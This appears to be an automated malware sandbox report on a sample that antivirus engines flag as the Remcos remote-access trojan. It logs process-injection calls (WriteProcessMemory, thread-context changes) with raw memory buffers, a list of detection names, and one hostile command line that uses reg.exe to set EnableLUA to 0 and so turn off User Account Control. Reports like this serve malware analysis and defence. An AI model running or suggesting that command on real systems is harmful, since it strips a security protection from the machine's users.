buffer: €ÿÿÿÿ±¿DNæ@»ÿÿÿÿ Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.ÿÿÿÿ “    ´tE¸wE²tE..€¡FL¶FL¶FL¶FL¶FL¶FL¶FL¶FL¶FL¶F„¡FP¶FP¶FP¶FP¶FP¶FP¶FP¶Fˆ¡Fÿÿÿÿ¸wE¨¢F¨¢F¨¢F¨¢F¨¢Fˆ¡F8zE¸{EŠEè¡F€§FCPSTPDT°¢Fð¢Fÿÿÿÿÿÿÿÿÿÿÿÿ€ ¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ€§Fþÿÿÿþÿÿÿu˜0Ï!­tåša¾Œe¸‘¢z»Œ^ž âȨ3œ46E.?AVtype_info@@46E.?AVbad_alloc@std@@46E.?AVbad_array_new_length@std@@46E.?AVlogic_error@std@@46E.?AVlength_error@std@@46E.?AVout_of_range@std@@46E.?AV_Facet_base@std@@46E.?AV_Locimp@locale@std@@46E.?AVfacet@locale@std@@46E.?AU_Crt_new_delete@std@@46E.?AVcodecvt_base@std@@46E.?AUctype_base@std@@46E.?AV?$ctype@D@std@@46E.?AV?$codecvt@DDU_Mbstatet@@@std@@46E.?AVbad_exception@std@@46E.H46E.?AVfailure@ios_base@std@@46E.?AVruntime_error@std@@46E.?AVsystem_error@std@@46E.?AVbad_cast@std@@46E.?AV_System_error@std@@46E.?AVexception@std@@
base_address: 0x0046a000
process_identifier: 2212
process_handle: 0x000001bc
1 1 0

WriteProcessMemory

buffer: €
base_address: 0x0046e000
process_identifier: 2212
process_handle: 0x000001bc
1 1 0

WriteProcessMemory

buffer: +ÔÔ„?¤Ø¾Ø„? Ù„?)s„?ÚuZ55g;Ù.~~Dñìð„?„?m(À'Æؒخ’õŒЈûõÛÝÛÝÛ(jk¡iæÞ\šF“£ã¥w¡Ô(´öä¼éÙ  b Er4NPNWN]TUZ[ äøää äö_^îØØäüûüû í9<8;ú` Ÿž†…¢†…§µ¶³´±²¯°†…¸ Ÿ†… Y
base_address: 0x0046f000
process_identifier: 2212
process_handle: 0x000001bc
1 1 0

WriteProcessMemory

buffer:  €X€0€Hl’äSETTINGSÎ/G‚íþhŠ€×´(e7lìi‚FŸ7r’Y¥ð,jE}ÞeÔH±gœEÐÔ©ÅßÍYˆäÄ`ç=^ȜªbÖ­êäÀ›ô74ãÞ +5¥­im£‚–²K1‘,:ÓÞ:Ú#ÃWª v'Ìóª8vG{íb¹ÝMiF(5³ÜÓ¯l¢DU`ÊÔ2 C`›ÊÇï+{¯x9’º=ù6áԘü …\7Úá`ò_fC'|ð.±^pKV-:ˑ†ü½ž/SÛD‚6 ïv;ÄAðֈºûQçñ€Þn-3¨ý‚[…UÛ@… BìêbÚxÏ쁊þý"ªñÉü8»™ña±á&¸kûO¨üù‹rB[XxîQVŽ+ÂOK¦*˜£È÷R ù%¼+g½I¹pÑÒoº{{9XÍJŽòÖ°Ò(\†×è€4Ç$û±5§9*G•]¾v/¸“? Í&©e%$Fù𛾠Ýã º¼À,óØUg7LǸå#^3æè—ÎúŽ2yÖ1‚lj“¯r—×Iê?—T¥y÷oæH¶˜òc¸û×Ï ¬ 5•Gjó$,΍Á¸G _öÿ‡"ªÄá‹Ûƒ zåÄP¥,ø¢VBOØF\APa<EþéÑ_óéSP¢ÉrÆ£1Åo­J6ŒÔ ­ÒññtFquáù¨“bI´¶µYbLxu¬-ð,ýuá`¢ T†?ÇC{õ¸ç§í ñЊ‰ÂIµŸ„ j±Û!ÃZlV>£¾>F„ NŒ”«ÛÎ qÀï ƒúI‹Þð¼~Â2±:Ñ"£±!ïe»u+‘ ÐPU¹¾ËÙgÒDȨp+ˆeF“Ïñê±Oaƒká:çÝr¼Œ­z³¡4;À§ˆLð-=ž Ê ˆpÅèK’ž6ijˆU´½ó¦M–™Œ¨£j³.äèý#Kȕ.Õeyæ<|˜¹¾þ ææ­v6kŒ…€µQê ÜÕÑ790 MÖ>ƒ¡±L«QëŒå‚û`òw«öPÐOù›[ºàÄIQA“CþÖ[ËX)ÿÌÚl/íÚ È ©|êZlo–f0¦_È´MhÒêyY·ˆ{1kWŸÒñX(Ô.ƒX tö¨Å¬¯m.›Ð}3Gv²:a¦ÛԊ¡:áy©0#ú†mÒÈÅêßם®8Ñÿ·- ò¿ë‰©±á<††®iˆë“nÊ”%Î!|`6ö"7&UH%ä¦zm9â‰÷^RBYݚÞËüVAብ¹œ€º¢<· wHõ3.Å´ŠL|ú±¶ì!¥Òºæ‹íCƒD–o­ÙB_aËó$ȲKûѝÑ/QrWÿœ¤µÉnm&?­8’Ü2ý€µÔX|;‹Öè2æ߮į‚ÛÓÞ3÷PÆ2י¶÷_Ëß.Ñkµø™! q°¸Â+4—Zîȯò Ë "g²Aν·HNã ¸Òø\€Î±‰„|óõra Gè'ÖùHV@×åh˜Ý ö³€Œ,ù+˜ó›ò ŽéS«éŸ‰MÁºñraZF¾Y°˜[a©ZR§|†·GxJÚw«>µˆ$›­$æÚQ-¶þ¼Íh×.9gjÝ!2A{¯ WâÈ–0ËÆVÅÈ|\`(LýƓ#¹`ëÉ l¿*|f©E6ìt•¼‚«‚Å2ÎfqWàKûmoèó§°7æ$i¤Ý;섣3Jz…hf™Áù+»“ßhIL”­Ò€Â­ÍÇ£CûCcñ÷Æ $ªX[\+8yԊ˜OÈ4‘¤h%dÛ´îue¤ (ƒèŽݩ…W¡X,&…Áñq̙½v‰f<8*3ÄOŒ²·jtW~W1~ސÇßqô+ù!:
base_address: 0x00470000
process_identifier: 2212
process_handle: 0x000001bc
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00471000
process_identifier: 2212
process_handle: 0x000001bc
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2212
process_handle: 0x000001bc
1 1 0

NtSetContextThread

registers.eip: 2007957956
registers.esp: 2554328
registers.edi: 0
registers.eax: 4388716
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001c0
process_identifier: 2212
1 0 0

NtResumeThread

thread_handle: 0x000001c0
suspend_count: 1
process_identifier: 2212
1 0 0

CreateProcessInternalW

thread_identifier: 3016
thread_handle: 0x00000084
process_identifier: 1632
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\reg.exe
track: 1
command_line: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
filepath_r: C:\Windows\System32\reg.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0
Elastic malicious (high confidence)
MicroWorld-eScan Dropped:Generic.Remcos.510742CA
FireEye Generic.mg.754cae6c58cfb857
McAfee Trojan-FTRG!754CAE6C58CF
Cylance Unsafe
Zillya Trojan.Generic.Win32.1460119
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 0053ba121 )
K7GW Trojan ( 0053ba121 )
Symantec ML.Attribute.HighConfidence
ESET-NOD32 Win32/Rescoms.B
APEX Malicious
ClamAV Win.Trojan.Remcos-9753190-0
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender Dropped:Generic.Remcos.510742CA
Avast Win32:RATX-gen [Trj]
Tencent Malware.Win32.Gencirc.10cec31d
Ad-Aware Dropped:Generic.Remcos.510742CA
Sophos Generic ML PUA (PUA)
DrWeb Trojan.Siggen14.55704
McAfee-GW-Edition BehavesLike.Win32.Generic.gh
Emsisoft Dropped:Generic.Remcos.510742CA (B)
Ikarus Trojan.Win32.Rescoms
Jiangmin Trojan.Generic.halxu
eGambit Unsafe.AI_Score_100%
Avira HEUR/AGEN.1141389
Antiy-AVL Trojan/Generic.ASMalwS.3458D2D
Gridinsoft Backdoor.Win32.Remcos.oa!s1
Microsoft Backdoor:Win32/Remcos.GA!MTB
ZoneAlarm HEUR:Trojan.Win32.Invader
GData Win32.Malware.Bucaspys.B
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.RemcosRAT.R418128
BitDefenderTheta Gen:NN.ZexaF.34126.BCW@aGglGK
ALYac Dropped:Generic.Remcos.510742CA
MAX malware (ai score=80)
VBA32 BScope.Backdoor.Remcos
Malwarebytes Malware.AI.3056317897
Rising Backdoor.Remcos!1.B6A7 (CLASSIC)
Yandex Trojan.Agent!wQ4Wbnu/ODE
SentinelOne Static AI - Malicious PE
Fortinet W32/Rescoms.M!tr
AVG Win32:RATX-gen [Trj]
Cybereason malicious.c58cfb
Panda Trj/GdSda.A
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\cmd.exe